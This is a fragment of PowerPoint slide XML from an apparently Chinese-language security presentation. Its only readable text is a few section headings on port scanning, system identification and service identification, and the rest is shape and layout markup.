            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.2 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5132070"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5932170"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
